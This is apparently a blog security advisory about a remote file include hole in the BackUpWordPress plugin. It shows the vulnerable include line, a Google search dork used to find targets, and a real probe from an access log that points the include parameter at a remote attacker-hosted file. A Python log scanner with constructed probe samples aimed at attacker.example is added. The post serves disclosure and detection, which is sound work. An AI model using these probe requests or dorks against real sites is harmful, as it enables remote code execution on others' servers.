BackUpWordPress Remote File Include Vulnerability

A remote file include vulnerability has been found in BackUpWordPress < 0.4.3.

This means an attacker can execute code on your web server if they can access the following script directly:

http://[target]/[path]/plugins/BackUp/Archive.php

A proof of concept exploit has already been released into the wild. We suggest you upgrade as soon as possible.

Affected code (the include path is read from a global variable rather than from a fixed plugin directory):

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

A new version is available here.

It looks like attackers are already starting to query Google for affected web sites:

http://www.google.com.br/search?hl=pt-BR&client=firefox-a&q="plugins/BackUp/Archive/"&btnG=Pesquisar&meta=

and are also probing blogs directly, as in this access-log entry:

209.190.23.66 - - [02/Nov/2007:11:51:14 +0000] "GET /category/wordpress/articles//BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.freewebtown.com/komandan/tool/q3.txt?? HTTP/1.1" 404 13951 "-" "libwww-perl/5.808"
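As an added detection example (not code from the post or from the plugin), the following Python scanner reads Apache combined-format log lines of the kind quoted above and flags any query parameter whose decoded value is a remote URL, the signature of an include-path parameter being pointed at an attacker-hosted file. The sample lines, IP addresses and host names are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, the shape of the access-log entry quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter whose (decoded) value starts with a remote scheme is the classic
# RFI signature: the request wants include()/require() to fetch that URL.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def parse_log_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def rfi_indicators(target):
    """(param, value) pairs in the request target whose value is a remote URL.
    parse_qs percent-decodes, so http%3A%2F%2F... is caught as well as http://..."""
    query = urlsplit(target).query
    return [(name, v)
            for name, values in parse_qs(query, keep_blank_values=True).items()
            for v in values if REMOTE_SCHEME_RE.match(v)]

def scan_for_rfi(lines):
    """One finding per suspicious parameter. Keep the status code for triage:
    a 404 (as in the post's entry) is a probe that missed, a 200 needs a closer look."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue  # skip lines that are not in combined format
        for name, value in rfi_indicators(rec["target"]):
            findings.append({"ip": rec["ip"], "path": urlsplit(rec["target"]).path,
                             "param": name, "value": value, "status": int(rec["status"])})
    return findings

# Constructed sample lines (documentation IPs and .example hosts, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Nov/2007:11:51:14 +0000] "GET /category/wordpress/articles//BackUp/Archive/Reader.php?bkpwp_plugin_path=http://attacker.example/q3.txt?? HTTP/1.1" 404 13951 "-" "libwww-perl/5.808"',
    '198.51.100.7 - - [02/Nov/2007:12:03:01 +0000] "GET /index.php?p=42 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [02/Nov/2007:12:10:45 +0000] "GET /plugins/BackUp/Archive.php?bkpwp_plugin_path=http%3A%2F%2Fattacker.example%2Fshell.txt%3F HTTP/1.1" 200 512 "-" "libwww-perl/5.808"',
]

for hit in scan_for_rfi(SAMPLE_LOG):
    print(f"{hit['ip']} -> {hit['path']} {hit['param']}={hit['value']} (HTTP {hit['status']})")
```

Feed it your own access log one line at a time; only the two constructed probe lines are reported, the ordinary page view is not.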


Comments

[...] there is a security hole in BackUpWordPress and, to go with it, an exploit (use for testing only). A fixed version [...]

[...] Remote File Inclusion (more) [...]

That’s awesome to see how fast attackers apply these new holes to their software… Even as a security-aware guy, you’re not really safe from getting hit, as you can’t react/check your plugins that often and that fast…

Phil, indeed, although our htaccess guide would have prevented this attack.

Saw a few of those queries on my blog this morning. Luckily I don’t run that script!

I don’t like backup plugins because they often contain many security issues.

After a quick look, I found another security issue that allows the execution of SQL queries.

Donncha, check out http://blogsecurity.net/wordpress/article-210607/

These steps would have mitigated the risk of this attack :)

Alex, it’s a great plugin, but it’s new… perhaps we should get involved and sponsor it.

First time to see someone saying “Nice plugin, let’s sponsor it.”
Made my day :)

[...] Blog Security. Liked this post? Then subscribe to the RSS feed! In my feeds you don’t read just the introduction, [...]

[...] namely the BackupWordPress plugin, because I had installed it to test it and, according to this post from BlogSecurity, it was vulnerable this [...]
